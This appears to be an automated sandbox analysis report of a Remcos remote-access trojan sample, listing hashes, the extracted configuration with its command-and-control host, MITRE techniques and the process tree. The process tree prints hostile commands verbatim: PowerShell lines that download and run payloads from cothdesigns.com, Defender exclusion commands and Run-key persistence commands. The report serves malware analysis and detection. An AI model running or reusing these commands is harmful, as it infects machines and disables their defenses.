remcos | 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
24-08-2022 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e34dbf3bceb9c9cf22f32ea7d870be4.exe
Size

149KB
MD5

8e34dbf3bceb9c9cf22f32ea7d870be4
SHA1

d9cd6c07ee134e10b179821808f617cdf2dc810b
SHA256

74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056
SHA512

3ccb54fdd4dff867a760c11b94f147b503ffd015cd5d8ee11a86f6afa0cfb3fe3507420bf5d94ee85f7c6773e0aa58084b83b142aa54cf9baea4824438143b47
SSDEEP

3072:J90Eg7YOC0q0vGBYovRDlDybNTPCtRqFvYs:1gYtvJDlmbRX

Score

10^/10

remcos 220825 persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns.com:443/obieznne.msi

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns.com:443/KMS_Tool.msi

Extracted

Family

remcos

Botnet

220825

cothdesigns.com:3456

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
180
copy_file
software_reporter_tool.exe
copy_folder
AppData\Local\Google
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%UserProfile%
keylog_crypt
true
keylog_file
adbkey.dat
keylog_flag
false
keylog_path
%Temp%
mouse_option
false
mutex
9416a517bdcd8521-XQOB43
screenshot_crypt
true
screenshot_flag
true
screenshot_folder
Google
screenshot_path
%Temp%
screenshot_time
60
startup_value
Google
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Google = "\"C:\\Users\\Admin\\AppData\\Local\\Google\\software_reporter_tool.exe\""	reg.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

8 1300 powershell.exe
11 1748 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

software_reporter_tool.exe

pid process

736 software_reporter_tool.exe

flow	pid	process
8	1300	powershell.exe
11	1748	powershell.exe

pid	process
736	software_reporter_tool.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2591564548-2301609547-1748242483-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2591564548-2301609547-1748242483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google = "\"C:\\Users\\Admin\\AppData\\Local\\Google\\software_reporter_tool.exe\""	reg.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com

flow	ioc
6	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

software_reporter_tool.exe

description pid process target process

PID 736 set thread context of 1672 736 software_reporter_tool.exe InstallUtil.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

616 380 WerFault.exe 8e34dbf3bceb9c9cf22f32ea7d870be4.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1252 reg.exe
1088 reg.exe

description	pid	process	target process
PID 736 set thread context of 1672	736	software_reporter_tool.exe	InstallUtil.exe

pid	pid_target	process	target process
616	380	WerFault.exe	8e34dbf3bceb9c9cf22f32ea7d870be4.exe

pid	process
1252	reg.exe
1088	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

8e34dbf3bceb9c9cf22f32ea7d870be4.exepowershell.exepowershell.exepowershell.exesoftware_reporter_tool.exe

pid	process
380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe
380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe
380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe
380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe
1144	powershell.exe
1748	powershell.exe
1300	powershell.exe
736	software_reporter_tool.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

8e34dbf3bceb9c9cf22f32ea7d870be4.exepowershell.exepowershell.exepowershell.exesoftware_reporter_tool.exe

description	pid	process
Token: SeDebugPrivilege	380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	736	software_reporter_tool.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

InstallUtil.exe

pid process

1672 InstallUtil.exe

pid	process
1672	InstallUtil.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

cmd.execmd.execmd.execmd.exe8e34dbf3bceb9c9cf22f32ea7d870be4.exepowershell.exesoftware_reporter_tool.exe

description	pid	process	target process
PID 1628 wrote to memory of 1540	1628	cmd.exe	netsh.exe
PID 1628 wrote to memory of 1540	1628	cmd.exe	netsh.exe
PID 1628 wrote to memory of 1540	1628	cmd.exe	netsh.exe
PID 800 wrote to memory of 880	800	cmd.exe	netsh.exe
PID 800 wrote to memory of 880	800	cmd.exe	netsh.exe
PID 800 wrote to memory of 880	800	cmd.exe	netsh.exe
PID 1520 wrote to memory of 1252	1520	cmd.exe	reg.exe
PID 1520 wrote to memory of 1252	1520	cmd.exe	reg.exe
PID 1520 wrote to memory of 1252	1520	cmd.exe	reg.exe
PID 1780 wrote to memory of 1088	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1088	1780	cmd.exe	reg.exe
PID 1780 wrote to memory of 1088	1780	cmd.exe	reg.exe
PID 380 wrote to memory of 616	380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe	WerFault.exe
PID 380 wrote to memory of 616	380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe	WerFault.exe
PID 380 wrote to memory of 616	380	8e34dbf3bceb9c9cf22f32ea7d870be4.exe	WerFault.exe
PID 1300 wrote to memory of 736	1300	powershell.exe	software_reporter_tool.exe
PID 1300 wrote to memory of 736	1300	powershell.exe	software_reporter_tool.exe
PID 1300 wrote to memory of 736	1300	powershell.exe	software_reporter_tool.exe
PID 1300 wrote to memory of 736	1300	powershell.exe	software_reporter_tool.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe
PID 736 wrote to memory of 1672	736	software_reporter_tool.exe	InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\8e34dbf3bceb9c9cf22f32ea7d870be4.exe
"C:\Users\Admin\AppData\Local\Temp\8e34dbf3bceb9c9cf22f32ea7d870be4.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:380
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 380 -s 1188
  2⤵
  - Program crash
  PID:616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\system32\netsh.exe
  netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
  2⤵
  PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE'
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
1⤵
- Suspicious use of WriteProcessMemory
PID:800
- C:\Windows\system32\netsh.exe
  netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
  2⤵
  PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
1⤵
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\system32\reg.exe
  reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
  2⤵
  - Adds policy Run key to start application
  - Modifies registry key
  PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
1⤵
- Suspicious use of WriteProcessMemory
PID:1780
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/obieznne.msi','C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe');C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe
  "C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/KMS_Tool.msi','C:\Users\Admin\AppData\Local\Temp\pmsozmjv.exe');C:\Users\Admin\AppData\Local\Temp\pmsozmjv.exe
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe

Filesize
2.4MB

MD5
f7f90d8534bb346735f6cd493bf056ac

SHA1
12c6d5bd30a6a527f54a3f75a11b79732e0d423d

SHA256
62ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1

SHA512
8c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1

Download Submit
C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe

Filesize
2.4MB

MD5
f7f90d8534bb346735f6cd493bf056ac

SHA1
12c6d5bd30a6a527f54a3f75a11b79732e0d423d

SHA256
62ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1

SHA512
8c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
377b202f319d50392bbfabee056242e4

SHA1
396b66a0122852299bf336b4d354aed55601db6b

SHA256
2698d5d0e29100596d6c99df1171ccbf79455480c9b8afd2da1776340d815219

SHA512
a51c7f7597670e419e870db6633cd1af44ed5e1e7f6489208ab9198f288de993051ed32c39226cea6c27a72abcecb11700bdee65201a6d7d66f096d810b13d68

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
377b202f319d50392bbfabee056242e4

SHA1
396b66a0122852299bf336b4d354aed55601db6b

SHA256
2698d5d0e29100596d6c99df1171ccbf79455480c9b8afd2da1776340d815219

SHA512
a51c7f7597670e419e870db6633cd1af44ed5e1e7f6489208ab9198f288de993051ed32c39226cea6c27a72abcecb11700bdee65201a6d7d66f096d810b13d68

Download Submit
memory/380-54-0x00000000012E0000-0x000000000130C000-memory.dmp

Filesize
176KB

Download
memory/616-82-0x0000000000000000-mapping.dmp

Download
memory/736-83-0x0000000000000000-mapping.dmp

Download
memory/736-88-0x0000000000CE0000-0x0000000000F44000-memory.dmp

Filesize
2.4MB

Download
memory/736-91-0x0000000004D30000-0x0000000004F92000-memory.dmp

Filesize
2.4MB

Download
memory/880-61-0x0000000000000000-mapping.dmp

Download
memory/1088-64-0x0000000000000000-mapping.dmp

Download
memory/1144-60-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1144-58-0x000007FEECC40000-0x000007FEED663000-memory.dmp

Filesize
10.1MB

Download
memory/1144-59-0x000007FEEC0E0000-0x000007FEECC3D000-memory.dmp

Filesize
11.4MB

Download
memory/1144-79-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
124KB

Download
memory/1144-81-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
124KB

Download
memory/1144-80-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/1144-76-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1252-63-0x0000000000000000-mapping.dmp

Download
memory/1300-69-0x000007FEECC40000-0x000007FEED663000-memory.dmp

Filesize
10.1MB

Download
memory/1300-85-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1300-77-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/1300-71-0x000007FEEC0E0000-0x000007FEECC3D000-memory.dmp

Filesize
11.4MB

Download
memory/1300-86-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/1300-73-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1540-55-0x0000000000000000-mapping.dmp

Download
memory/1540-56-0x000007FEFBDD1000-0x000007FEFBDD3000-memory.dmp

Filesize
8KB

Download
memory/1672-101-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-104-0x00000000004327A4-mapping.dmp

Download
memory/1672-109-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-108-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-107-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-106-0x0000000075F21000-0x0000000075F23000-memory.dmp

Filesize
8KB

Download
memory/1672-103-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-92-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-93-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-95-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-97-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-98-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-99-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1672-100-0x0000000000400000-0x000000000047B000-memory.dmp

Filesize
492KB

Download
memory/1748-78-0x0000000002AFB000-0x0000000002B1A000-memory.dmp

Filesize
124KB

Download
memory/1748-75-0x000000001B840000-0x000000001BB3F000-memory.dmp

Filesize
3.0MB

Download
memory/1748-70-0x000007FEECC40000-0x000007FEED663000-memory.dmp

Filesize
10.1MB

Download
memory/1748-90-0x0000000002AFB000-0x0000000002B1A000-memory.dmp

Filesize
124KB

Download
memory/1748-89-0x0000000002AF4000-0x0000000002AF7000-memory.dmp

Filesize
12KB

Download
memory/1748-72-0x000007FEEC0E0000-0x000007FEECC3D000-memory.dmp

Filesize
11.4MB

Download
memory/1748-74-0x0000000002AF4000-0x0000000002AF7000-memory.dmp

Filesize
12KB

Download